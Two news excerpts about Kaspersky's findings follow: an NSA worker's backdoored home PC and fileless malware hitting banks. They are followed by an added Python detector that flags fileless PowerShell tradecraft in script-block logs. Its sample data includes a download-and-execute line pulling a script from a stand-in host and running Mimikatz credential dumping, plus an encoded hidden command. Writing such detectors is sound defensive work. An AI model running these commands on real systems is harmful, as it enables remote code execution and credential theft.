Worker who snuck NSA malware home had his PC backdoored, Kaspersky says

An NSA worker who reportedly snuck classified materials out of the agency stored them on a home computer that was later infected by a malicious backdoor that allowed third parties to remotely access the machine, officials with Moscow-based antivirus provider Kaspersky Lab said.

The NSA worker—described in some published reports as a contractor and in others as an employee—installed the backdoor after Kaspersky AV had first detected never-before-seen NSA malware samples on his computer. The backdoor was part of a pirated software package that the worker downloaded and installed. To run the pirated software, he first had to disable the AV program on his computer. After being infected, the worker re-enabled the AV program and scanned his computer multiple times, resulting in Kaspersky developing detections for new and unknown variants of the NSA malware.

The NSA worker's computer ran a home version of Kaspersky AV that had enabled a voluntary service known as Kaspersky Security Network. When turned on, KSN automatically uploads new and previously unknown malware to Kaspersky Lab servers. The setting eventually caused the previously undetected NSA malware to be uploaded to Kaspersky Lab servers, where it was then reviewed by a company analyst.


A rash of invisible, fileless malware is infecting banks around the globe

Two years ago, researchers at Moscow-based Kaspersky Lab discovered their corporate network was infected with malware that was unlike anything they had ever seen. Virtually all of the malware resided solely in the memory of the compromised computers, a feat that had allowed the infection to remain undetected for six months or more. Kaspersky eventually unearthed evidence that Duqu 2.0, as the never-before-seen malware was dubbed, was derived from Stuxnet, the highly sophisticated computer worm reportedly created by the US and Israel to sabotage Iran's nuclear program.

Now, fileless malware is going mainstream, as financially motivated criminal hackers mimic their nation-sponsored counterparts. According to research Kaspersky Lab plans to publish Wednesday, networks belonging to at least 140 banks and other enterprises have been infected by malware that relies on the same in-memory design to remain nearly invisible. Because infections are so hard to spot, the actual number is likely much higher. Another trait that makes the infections hard to detect is the use of legitimate and widely used system administration and security tools—including PowerShell, Metasploit, and Mimikatz—to inject the malware into computer memory.

"What's interesting here is that these attacks are ongoing globally against banks themselves," Kaspersky Lab expert Kurt Baumgartner told Ars. "The banks have not been adequately prepared in many cases to deal with this." He went on to say that people behind the attacks are "pushing money out of the banks from within the banks," by targeting computers that run automatic teller machines.
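Because the in-memory tooling described above leaves few files to scan, defenders typically fall back on PowerShell script-block logging and look for the tell-tale patterns of code being pulled straight into memory. The following is an added illustration, not code from the article or from Kaspersky Lab; the indicator patterns and the sample log entries are constructed for this example and are not a complete rule set.

```python
import re

# Indicators of in-memory (fileless) PowerShell tradecraft as described in the
# article: code loaded directly into memory rather than dropped to disk, and
# credential-dumping or framework payloads invoked from a script block.
# These regexes are illustrative assumptions, not a vendor rule set.
INDICATORS = {
    "encoded_command": re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"),
    "download_exec": re.compile(
        r"(?i)(?:iex|invoke-expression)\s*\(?\s*\(?\s*new-object\s+(?:system\.)?net\.webclient\)?\.downloadstring"),
    "reflective_load": re.compile(r"(?i)\[(?:system\.)?reflection\.assembly\]::load\("),
    "credential_dump": re.compile(r"(?i)invoke-mimikatz|sekurlsa::"),
    "memory_injection": re.compile(r"(?i)virtualalloc|writeprocessmemory|createremotethread"),
}

def classify(script_text):
    """Return the sorted list of indicator names that match one script block."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(script_text))

def scan_events(events):
    """events: iterable of (host, script_text) pairs from script-block logging.
    Returns one record per suspicious event; benign blocks are dropped."""
    hits = []
    for host, text in events:
        tags = classify(text)
        if tags:
            hits.append({"host": host, "indicators": tags, "snippet": text[:60]})
    return hits

# Constructed sample script-block log entries (hostnames and content are made up).
SAMPLE_EVENTS = [
    ("atm-ops-01", "Get-Service | Where-Object {$_.Status -eq 'Running'}"),
    ("atm-ops-02", "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1'); Invoke-Mimikatz -DumpCreds"),
    ("fileserver", "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ("hr-pc-07", "[System.Reflection.Assembly]::Load($bytes) | Out-Null"),
]

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(hit["host"], hit["indicators"], hit["snippet"])
```

The benign service query on the first host produces no hit, while the other three entries are flagged by the category of in-memory behaviour they exhibit, which is the starting point for an analyst rather than a verdict on its own.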
